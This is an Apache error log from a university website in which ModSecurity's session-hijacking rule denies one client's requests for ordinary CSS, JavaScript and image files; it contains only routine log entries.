[Mon Aug 28 08:10:51.259153 2023] [:error] [pid 37539] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/jquery.fancybox-1.3.4.css"] [unique_id "ZOv0G8Co-f0AAJKjZ@oAAAAG"]
[Mon Aug 28 08:10:51.259183 2023] [:error] [pid 38302] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/ddsmoothmenu.css"] [unique_id "ZOv0G8Co-f0AAJWeoSoAAAAF"]
[Mon Aug 28 08:10:51.268594 2023] [:error] [pid 38059] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/nivo-slider.css"] [unique_id "ZOv0G8Co-f0AAJSr2t0AAAAO"]
[Mon Aug 28 08:10:51.337515 2023] [:error] [pid 38196] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/ext-all.css"] [unique_id "ZOv0G8Co-f0AAJU0qasAAAAD"]
[Mon Aug 28 08:10:51.337515 2023] [:error] [pid 37803] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext_plugins/statusbar/css/statusbar.css"] [unique_id "ZOv0G8Co-f0AAJOr97QAAAAL"]
[Mon Aug 28 08:10:51.337542 2023] [:error] [pid 38065] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/gallery_album.css"] [unique_id "ZOv0G8Co-f0AAJSxYykAAAAH"]
[Mon Aug 28 08:10:51.338807 2023] [:error] [pid 38303] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/xtheme-gray.css"] [unique_id "ZOv0G8Co-f0AAJWfZG8AAAAI"]
[Mon Aug 28 08:10:51.362401 2023] [:error] [pid 37539] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/css/Spinner.css"] [unique_id "ZOv0G8Co-f0AAJKjZ@sAAAAG"]
[Mon Aug 28 08:10:51.367410 2023] [:error] [pid 38065] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOv0G8Co-f0AAJSxYyoAAAAH"]
[Mon Aug 28 08:10:51.370650 2023] [:error] [pid 38303] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOv0G8Co-f0AAJWfZHAAAAAI"]
[Mon Aug 28 08:10:51.374614 2023] [:error] [pid 37803] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/examples.css"] [unique_id "ZOv0G8Co-f0AAJOr97UAAAAL"]
[Mon Aug 28 08:10:51.383249 2023] [:error] [pid 38059] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOv0G8Co-f0AAJSr2t4AAAAO"]
[Mon Aug 28 08:10:51.390050 2023] [:error] [pid 38150] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOv0G8Co-f0AAJUGIVcAAAAC"]
[Mon Aug 28 08:10:51.394399 2023] [:error] [pid 38196] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/treegrid/treegrid.css"] [unique_id "ZOv0G8Co-f0AAJU0qawAAAAD"]
[Mon Aug 28 08:10:51.395413 2023] [:error] [pid 38065] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery-1.4.4.min.js"] [unique_id "ZOv0G8Co-f0AAJSxYysAAAAH"]
[Mon Aug 28 08:10:51.396222 2023] [:error] [pid 37803] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/reset-min.css"] [unique_id "ZOv0G8Co-f0AAJOr97YAAAAL"]
[Mon Aug 28 08:10:51.401093 2023] [:error] [pid 38303] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/scripts.js"] [unique_id "ZOv0G8Co-f0AAJWfZHEAAAAI"]
[Mon Aug 28 08:10:51.415450 2023] [:error] [pid 38149] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.ScrollTo.js"] [unique_id "ZOv0G8Co-f0AAJUFNTUAAAAA"]
[Mon Aug 28 08:10:51.417285 2023] [:error] [pid 37539] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/AC_RunActiveContent.js"] [unique_id "ZOv0G8Co-f0AAJKjZ@wAAAAG"]
[Mon Aug 28 08:10:51.424228 2023] [:error] [pid 37803] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.mousewheel-3.0.4.pack.js"] [unique_id "ZOv0G8Co-f0AAJOr97cAAAAL"]
[Mon Aug 28 08:10:51.425214 2023] [:error] [pid 38303] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox-1.3.4.js"] [unique_id "ZOv0G8Co-f0AAJWfZHIAAAAI"]
[Mon Aug 28 08:10:51.444361 2023] [:error] [pid 38065] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox.settings.js"] [unique_id "ZOv0G8Co-f0AAJSxYywAAAAH"]
[Mon Aug 28 08:10:51.447471 2023] [:error] [pid 38059] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/cufon-yui.js"] [unique_id "ZOv0G8Co-f0AAJSr2t8AAAAO"]
[Mon Aug 28 08:10:51.453114 2023] [:error] [pid 37803] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/Sansation_300-Sansation_700.font.js"] [unique_id "ZOv0G8Co-f0AAJOr97gAAAAL"]
[Mon Aug 28 08:10:51.454961 2023] [:error] [pid 38303] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.js"] [unique_id "ZOv0G8Co-f0AAJWfZHMAAAAI"]
[Mon Aug 28 08:10:51.480370 2023] [:error] [pid 37539] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.settings.js"] [unique_id "ZOv0G8Co-f0AAJKjZ@0AAAAG"]
[Mon Aug 28 08:10:51.481210 2023] [:error] [pid 37803] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.pack.js"] [unique_id "ZOv0G8Co-f0AAJOr97kAAAAL"]
[Mon Aug 28 08:10:51.509178 2023] [:error] [pid 38059] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.settings.js"] [unique_id "ZOv0G8Co-f0AAJSr2uAAAAAO"]
[Mon Aug 28 08:10:51.510452 2023] [:error] [pid 38303] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/aslider.js"] [unique_id "ZOv0G8Co-f0AAJWfZHQAAAAI"]
[Mon Aug 28 08:10:51.538704 2023] [:error] [pid 37539] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/slidingboxes.js"] [unique_id "ZOv0G8Co-f0AAJKjZ@4AAAAG"]
[Mon Aug 28 08:10:51.561309 2023] [:error] [pid 38150] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/supersleight.plugin.js"] [unique_id "ZOv0G8Co-f0AAJUGIVgAAAAC"]
[Mon Aug 28 08:10:51.566764 2023] [:error] [pid 38149] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/styleswitch.js"] [unique_id "ZOv0G8Co-f0AAJUFNTYAAAAA"]
[Mon Aug 28 08:10:51.579273 2023] [:error] [pid 38059] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/adapter/ext/ext-base.js"] [unique_id "ZOv0G8Co-f0AAJSr2uEAAAAO"]
[Mon Aug 28 08:10:51.591943 2023] [:error] [pid 38303] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/ext-all.css"] [unique_id "ZOv0G8Co-f0AAJWfZHUAAAAI"]
[Mon Aug 28 08:10:51.595265 2023] [:error] [pid 37803] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/xtheme-gray.css"] [unique_id "ZOv0G8Co-f0AAJOr97oAAAAL"]
[Mon Aug 28 08:10:51.618481 2023] [:error] [pid 38065] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext_plugins/statusbar/css/statusbar.css"] [unique_id "ZOv0G8Co-f0AAJSxYy0AAAAH"]
[Mon Aug 28 08:10:51.620221 2023] [:error] [pid 38149] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOv0G8Co-f0AAJUFNTcAAAAA"]
[Mon Aug 28 08:10:51.621063 2023] [:error] [pid 38303] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/css/Spinner.css"] [unique_id "ZOv0G8Co-f0AAJWfZHYAAAAI"]
[Mon Aug 28 08:10:51.622852 2023] [:error] [pid 37803] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOv0G8Co-f0AAJOr97sAAAAL"]
[Mon Aug 28 08:10:51.652919 2023] [:error] [pid 37539] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/examples.css"] [unique_id "ZOv0G8Co-f0AAJKjZ@8AAAAG"]
[Mon Aug 28 08:10:51.691968 2023] [:error] [pid 38149] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOv0G8Co-f0AAJUFNTgAAAAA"]
[Mon Aug 28 08:10:51.699548 2023] [:error] [pid 38150] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOv0G8Co-f0AAJUGIVkAAAAC"]
[Mon Aug 28 08:10:51.726631 2023] [:error] [pid 38196] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/treegrid/treegrid.css"] [unique_id "ZOv0G8Co-f0AAJU0qa0AAAAD"]
[Mon Aug 28 08:10:51.753158 2023] [:error] [pid 37539] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ext-all.js"] [unique_id "ZOv0G8Co-f0AAJKjZ-AAAAAG"]
[Mon Aug 28 08:10:51.754639 2023] [:error] [pid 38150] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/store/DataMasterPublic.js"] [unique_id "ZOv0G8Co-f0AAJUGIVoAAAAC"]
[Mon Aug 28 08:10:51.783367 2023] [:error] [pid 38059] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/pendaftaran/verifikasipmb_form.js"] [unique_id "ZOv0G8Co-f0AAJSr2uIAAAAO"]
[Mon Aug 28 08:10:51.792382 2023] [:error] [pid 38196] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/Ext.ux.grid.Search.js"] [unique_id "ZOv0G8Co-f0AAJU0qa4AAAAD"]
[Mon Aug 28 08:10:51.793239 2023] [:error] [pid 38065] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/find_m.js"] [unique_id "ZOv0G8Co-f0AAJSxYy4AAAAH"]
[Mon Aug 28 08:10:51.802613 2023] [:error] [pid 37803] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/form/NumberField.js"] [unique_id "ZOv0G8Co-f0AAJOr97wAAAAL"]
[Mon Aug 28 08:10:51.804979 2023] [:error] [pid 38303] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/website/ftracerstudy.js"] [unique_id "ZOv0G8Co-f0AAJWfZHcAAAAI"]
[Mon Aug 28 08:10:51.875518 2023] [:error] [pid 37539] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/no-profile-image.jpg"] [unique_id "ZOv0G8Co-f0AAJKjZ-EAAAAG"]
[Mon Aug 28 08:10:51.906426 2023] [:error] [pid 38059] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/deny_haspada.jpg"] [unique_id "ZOv0G8Co-f0AAJSr2uMAAAAO"]
[Mon Aug 28 08:10:51.938463 2023] [:error] [pid 38065] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/Pas_Foto.jpg"] [unique_id "ZOv0G8Co-f0AAJSxYy8AAAAH"]
[Mon Aug 28 08:10:51.973121 2023] [:error] [pid 38303] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/Msn-Buddy-web-icon.png"] [unique_id "ZOv0G8Co-f0AAJWfZHgAAAAI"]
[Mon Aug 28 08:10:51.975290 2023] [:error] [pid 38302] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/IMG_20160613_100811.jpg"] [unique_id "ZOv0G8Co-f0AAJWeoSwAAAAF"]
[Mon Aug 28 08:10:51.981209 2023] [:error] [pid 38150] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/menu.css"] [unique_id "ZOv0G8Co-f0AAJUGIVsAAAAC"]
[Mon Aug 28 08:10:51.981370 2023] [:error] [pid 37539] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/dark.css"] [unique_id "ZOv0G8Co-f0AAJKjZ-IAAAAG"]
[Mon Aug 28 08:10:51.983791 2023] [:error] [pid 38149] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/green.css"] [unique_id "ZOv0G8Co-f0AAJUFNTkAAAAA"]
[Mon Aug 28 08:10:51.984045 2023] [:error] [pid 38196] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/blue.css"] [unique_id "ZOv0G8Co-f0AAJU0qa8AAAAD"]
[Mon Aug 28 08:10:52.004187 2023] [:error] [pid 38059] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/no-profile-image.jpg"] [unique_id "ZOv0HMCo-f0AAJSr2uQAAAAO"]
[Mon Aug 28 08:10:52.006373 2023] [:error] [pid 38303] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/bg.css"] [unique_id "ZOv0HMCo-f0AAJWfZHkAAAAI"]
